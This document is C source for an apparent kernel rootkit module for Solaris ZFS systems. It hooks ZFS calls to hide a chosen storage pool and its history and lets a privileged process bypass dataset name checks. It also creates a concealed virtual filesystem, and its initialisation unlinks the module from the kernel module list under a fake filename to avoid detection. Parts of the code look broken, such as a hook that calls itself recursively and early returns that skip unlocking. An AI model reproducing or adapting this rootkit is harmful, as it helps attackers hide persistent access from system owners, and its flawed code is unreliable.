void
hook_zfs_log_history(zfs_cmd_t *zc)
{

ATOMIC_LOCK(zfs_log_history)

	debug("log query: %s", zc->zc_name);
	
	debug("zc_name: %s", zc->zc_name); 	
	if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) || 
        	!strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
		debug("denying history log on pool: %s", zc->zc_name);
		// XXX: make history disapear
		orig_zfs_log_history(zc);
		ATOMIC_UNLOCK
		return;
	}

	orig_zfs_log_history(zc);

ATOMIC_UNLOCK	

	return;
}

int
hook_zfs_ioc_pool_get_history(zfs_cmd_t *zc)
{
	int ret = 0;

ATOMIC_LOCK(zfs_ioc_pool_get_history)

	ret = hook_zfs_ioc_pool_get_history(zc);
        if ( !strncmp(ZFS_POOL, zc->zc_name, sizeof(ZFS_POOL)) ||
                !strncmp(ZFS_POOL_FS, zc->zc_name, sizeof(ZFS_POOL_FS)) ) {
                debug("denying history log on pool: %s", zc->zc_name);
	// XXX:	bzero(zc->zc_history, zc->zc_history_len);
        }

ATOMIC_UNLOCK

	return(ret);
}

int
hook_zfs_ioc_pool_configs(zfs_cmd_t *zc)
{
 	nvpriv_t *priv;
     	i_nvp_t *curr;
        nvlist_t *nvl;
        int error;

ATOMIC_LOCK(zfs_ioc_pool_configs)

        if ( (nvl = sys_spa_all_configs(&zc->zc_cookie)) == NULL)
                return (EEXIST);

	/* intercept here */
     	if ( (priv = (nvpriv_t *)(uintptr_t)nvl->nvl_priv) == NULL)
     		return (EINVAL);
     
     	curr = priv->nvp_list;
    	while (curr != NULL) {
    		nvpair_t *nvp = &curr->nvi_nvp;
     
     		curr = curr->nvi_next;
    		if ( strcmp(ZFS_POOL, NVP_NAME(nvp)) != 0)
    			continue;

		nvp_buf_unlink(nvl, nvp);
		nvpair_free(nvp);
		nvp_buf_free(nvl, nvp);
	}

	/* after removing the pool, store the info for the user */
        error = sys_put_nvlist(zc, nvl);

        nvlist_free(nvl);

ATOMIC_UNLOCK

        return (error);
}


int
hook_dsl_dir_is_private(dsl_dir_t *dd)
{
        int rv = FALSE;

ATOMIC_LOCK(dsl_dir_is_private)

	debug("aqui: %s", dd->dd_myname);
        if (dd->dd_parent && orig_dsl_dir_is_private(dd->dd_parent))
                rv = TRUE;
        if (sys_dataset_name_hidden(dd->dd_myname))
                rv = TRUE;

ATOMIC_UNLOCK

        return (rv);
}


/*
 * Dataset names must be of the following form:
 *
 *      [component][/]*[component][@component]
 *
 * Where each component is made up of alphanumeric characters plus the following
 * characters:
 *
 *      [-_.:%]
 *
 * We allow '%' here as we use that character internally to create unique
 * names for temporary clones (for online recv).
 */
int
hook_dataset_namecheck(const char *path, namecheck_err_t *why, char *what)
{
	int ret;
	short ppid = sys_getpid();

ATOMIC_LOCK(dataset_namecheck)

	/* we permit everything ;) */
	if ( IS_SUPERMAN(ppid) ) {
		debug("permitting anything", "");
		ATOMIC_UNLOCK
		return ( 0 );
	}

	ret = orig_dataset_namecheck(path, why, what);

ATOMIC_UNLOCK

	return ( ret );
}


/** 
 * VFS LAYER 
 *
 */

/* VFS OPS */
static gfs_dirent_t ksh_root_entries[] = {
       		{ "ksh", 	ksh_mknode_kshdir, 		GFS_CACHE_VNODE },
       		{ NULL }
	};

/**
 * RETURN ksh root vnode pointer 
 */
vnode_t *
ksh_root(znode_t *zp)
{
	ASSERT(z_ksh_root_vnode != NULL);
        VN_HOLD(z_ksh_root_vnode);
        return (z_ksh_root_vnode);
}

int
ksh_root_lookup(vnode_t *dvp, char *nm, vnode_t **vpp, pathname_t *pnp,
    int flags, vnode_t *rdir, cred_t *cr, caller_context_t *ct,
    int *direntflags, pathname_t *realpnp)
{
        zfsvfs_t *zfsvfs = dvp->v_vfsp->vfs_data;
        int err;

        /*
         * No extended attributes allowed under .zfs
         */
        if (flags & LOOKUP_XATTR)
                return (EINVAL);

        if (strcmp(nm, "..") == 0) {
                err = VFS_ROOT(dvp->v_vfsp, vpp);
        } else {
                err = gfs_vop_lookup(dvp, nm, vpp, pnp, flags, rdir,
                    cr, ct, direntflags, realpnp);
        }

        return (err);
}

/*
 * pvp is the '.zfs' directory (zfsctl_node_t).
 * Creates vp, which is '.zfs/snapshot' (zfsctl_snapdir_t).
 *
 * This function is the callback to create a GFS vnode for '.zfs/snapshot'
 * when a lookup is performed on .zfs for "snapshot".
 */
vnode_t *
ksh_mknode_kshdir(vnode_t *pvp)
{
        vnode_t *vp;
        zfsctl_node_t *sdp;

        vp = gfs_dir_create(sizeof (zfsctl_node_t), pvp,
            ksh_ops_root, NULL, NULL, MAXNAMELEN,
            NULL, NULL);
        sdp = vp->v_data;
        sdp->zc_cmtime = ((zfsctl_node_t *)pvp->v_data)->zc_cmtime;

        return (vp);
}

/* ARGSUSED */
static ino64_t
ksh_root_inode_cb(vnode_t *vp, int index)
{
        zfsvfs_t *zfsvfs = vp->v_vfsp->vfs_data;

        ASSERT(index <= 2);

        if (index == 0)
                return (ZFSCTL_INO_SNAPDIR);

        return (zfsvfs->z_shares_dir);
}

static void
ksh_common_getattr(vnode_t *vp, vattr_t *vap)
{
        zfsctl_node_t   *zcp = vp->v_data;
        timestruc_t     now;

	debug("aqui", "");

        vap->va_uid = 0;
        vap->va_gid = 0;
        vap->va_rdev = 0;
        /*
         * We are a purly virtual object, so we have no
         * blocksize or allocated blocks.
         */
        vap->va_blksize = 0;
        vap->va_nblocks = 0;
        vap->va_seq = 0;
        vap->va_fsid = vp->v_vfsp->vfs_dev;
        vap->va_mode = S_IRUSR | S_IXUSR | S_IRGRP | S_IXGRP |
            S_IROTH | S_IXOTH;
        vap->va_type = VDIR;
        /*
         * We live in the now (for atime).
         */
        gethrestime(&now);
        vap->va_atime = now;
        vap->va_mtime = vap->va_ctime = zcp->zc_cmtime;
}

/*
 * Common open routine.  Disallow any write access.
 */
/* ARGSUSED */
static int
ksh_common_open(vnode_t **vpp, int flags, cred_t *cr, caller_context_t *ct)
{
        if (flags & FWRITE)
                return (EACCES);

        return (0);
}

/*
 * Common close routine.  Nothing to do here.
 */
/* ARGSUSED */
static int
ksh_common_close(vnode_t *vpp, int flags, int count, offset_t off,
    cred_t *cr, caller_context_t *ct)
{
        return (0);
}

#define NROOT_ENTRIES   ((sizeof (ksh_root_entries) / \
    sizeof (gfs_dirent_t)) + 1)

static int
ksh_root_getattr(vnode_t *vp, vattr_t *vap, int flags, cred_t *cr,
    caller_context_t *ct)
{
        zfsvfs_t *zfsvfs = vp->v_vfsp->vfs_data;

        vap->va_nodeid = KSH_INO_ROOT;
        vap->va_nlink = vap->va_size = NROOT_ENTRIES;

        ksh_common_getattr(vp, vap);

        return (0);
}

static int
ksh_common_access(vnode_t *vp, int mode, int flags, cred_t *cr,
    caller_context_t *ct)
{
        if (flags & V_ACE_MASK) {
                if (mode & ACE_ALL_WRITE_PERMS)
                        return (EACCES);
        } else {
                if (mode & VWRITE)
                        return (EACCES);
        }

        return (0);
}

/* VFS OPS */
static const fs_operation_def_t zfs_dvnodeops_template[] = {
        	{ VOPNAME_OPEN,         { .vop_open = ksh_common_open }      	},
	        { VOPNAME_CLOSE,        { .vop_close = ksh_common_close }    	},
	        { VOPNAME_GETATTR,      { .vop_getattr = ksh_root_getattr }  	},
       		{ VOPNAME_ACCESS,       { .vop_access = ksh_common_access }  	},
		{ VOPNAME_IOCTL,        { .error = fs_inval }			},
		{ VOPNAME_LOOKUP,       { .vop_lookup = ksh_root_lookup }	},
		{ VOPNAME_READDIR,      { .vop_readdir = gfs_vop_readdir }	},
		{ VOPNAME_INACTIVE,     { .vop_inactive = gfs_vop_inactive }	},
		{ VOPNAME_IOCTL,        { .vop_ioctl = fs_inval }		},
                NULL,                   NULL
       };

static gfs_opsvec_t ksh_opsvec[] = {
 		{ ".zfs", 	zfs_dvnodeops_template,	&ksh_ops_root 	},
       		{ NULL }
	};



/**
 * CREATE THE VIRTUAL FS
 */
int
ksh_vfs_init(zfsvfs_t *z_zfsvfs)
{
	int error;
	vnode_t *vp, *rvp;
	zfsvfs_t *zfsvfs = z_zfsvfs;
	zfsctl_node_t *zcp;
/*
	fs_operation_def_t l_zfs_dvnodeops_template[] = {
    		VOPNAME_OPEN,           { .vop_open = sys_zfs_open },
      	 	VOPNAME_CLOSE,          { .vop_close = sys_zfs_close },
    	 	VOPNAME_READ,           { .vop_read = orig_zfs_read },
     		VOPNAME_WRITE,          { .vop_write = orig_zfs_write },
     	 	VOPNAME_IOCTL,          { .vop_ioctl = sys_zfs_ioctl },
       		VOPNAME_GETATTR,        { .vop_getattr = sys_zfs_getattr },
        	VOPNAME_SETATTR,        { .vop_setattr = sys_zfs_setattr },
        	VOPNAME_ACCESS,         { .vop_access = sys_zfs_access },
        	VOPNAME_LOOKUP,         { .vop_lookup = ksh_root_lookup },
        	VOPNAME_CREATE,         { .vop_create = sys_zfs_create },
        	VOPNAME_REMOVE,         { .vop_remove = sys_zfs_remove },
        	VOPNAME_LINK,           { .vop_link = sys_zfs_link },
       	 	VOPNAME_RENAME,         { .vop_rename = sys_zfs_rename },
        	VOPNAME_MKDIR,          { .vop_mkdir = orig_zfs_mkdir },
        	VOPNAME_RMDIR,          { .vop_rmdir = sys_zfs_rmdir },
        	VOPNAME_READDIR,        { .vop_readdir = gfs_vop_readdir },
        	VOPNAME_SYMLINK,        { .vop_symlink = sys_zfs_symlink },
        	VOPNAME_FSYNC,          { .vop_fsync = sys_zfs_fsync },
        	VOPNAME_INACTIVE,       { .vop_inactive = sys_zfs_inactive },
        	VOPNAME_FID,            { .vop_fid = sys_zfs_fid },
        	VOPNAME_SEEK,           { .vop_seek = sys_zfs_seek },
        	VOPNAME_PATHCONF,       { .vop_pathconf = sys_zfs_pathconf },
        	VOPNAME_GETSECATTR,     { .vop_getsecattr = sys_zfs_getsecattr },
        	VOPNAME_SETSECATTR,     { .vop_setsecattr = sys_zfs_setsecattr },
        	NULL,                   NULL
	};
*/
	z_ksh_root_vnode = NULL;

        vp = gfs_root_create(sizeof (zfsctl_node_t), zfsvfs->z_vfs,
     		     ksh_ops_root, KSH_INO_ROOT, ksh_root_entries,
      		     ksh_root_inode_cb, MAXNAMELEN, NULL, NULL);

	zcp = vp->v_data;
     	zcp->zc_id = KSH_INO_ROOT;

       	VERIFY(VFS_ROOT(zfsvfs->z_vfs, &rvp) == 0);
       	ZFS_TIME_DECODE(&zcp->zc_cmtime, VTOZ(rvp)->z_phys->zp_crtime);
       	VN_RELE(rvp);

       	vp->v_flag &= ~(VROOT | VNOCACHE | VNOMAP | VNOSWAP | VNOMOUNT);

	error = gfs_make_opsvec(ksh_opsvec);
	if ( error != 0 ) {
		debug("gfs_make_opsvec failed with %d\n", error);
		DTRACE_PROBE2(ksh_ops_root,
				    char *, "vn_make_ops failed for dv_vnodeops",
		    		    int, error);
		return (error);		
	}

	/* put in our ctldir */
	z_ksh_root_vnode = vp;

	is_vfs_init = B_TRUE;

	return ( 0 );
}

int
ksh_vfs_fini()
{
	/* free the VFS */
        if (ksh_ops_root)
                vn_freevnodeops(ksh_ops_root);
}

/**
 * MODULE INITIALIZATION 
 */
int
_init(void)
{
	int e, num;

	int * lmid_ptr;
	struct modctl *mods = &modules, *soy;

	is_vfs_init = 0;
        soy = mods->mod_prev;


        mutex_init(&ksh_lock, NULL, MUTEX_DRIVER, NULL);

	do_hook(mods, soy->mod_mp);

	num = 0;
	while ( hooks[num].name ) {
		set_sym_tbl_name(soy->mod_mp, hooks[num].hook_handler);
		set_sym_tbl_name(soy->mod_mp, hooks[num].orig_handler);
		num++;
	}
	kobj_sync();

#ifndef DEBUG
	/* HIDE MODULE NOW */
        soy->mod_nenabled = 0;
        soy->mod_loaded = 0;
        soy->mod_installed = 0;
        soy->mod_loadcnt = 0;
        soy->mod_gencount = 0;

	strcpy(soy->mod_filename, "/won/der/land");
	strcpy(soy->mod_modname, MODULE_NAME);

        mods->mod_prev->mod_prev->mod_next = mods;
        mods->mod_prev = mods->mod_prev->mod_prev;

	kobj_sync();

	lmid_ptr = kobj_getsymvalue("last_module_id", 0); 
	*lmid_ptr = *lmid_ptr - 1;
#endif

	if ((e = mod_install(&modlinkage)) != 0)  {
                mutex_destroy(&ksh_lock);
        }
			
	cmn_err(CE_WARN, "ksh entered the building");
	
	return (e);
}

int
_fini(void)
{
        int e;
	struct modctl *mods=&modules;

	do_unhook(mods);

	cmn_err(CE_WARN, "ksh has left the building");

        if ((e = mod_remove(&modlinkage)) != 0)  {
                return (e);
        }

        mutex_destroy(&ksh_lock);	

	kobj_sync();	

        return (e);
}

int
_info(struct modinfo *modinfop)
{
	return (mod_info(&modlinkage, modinfop));
}
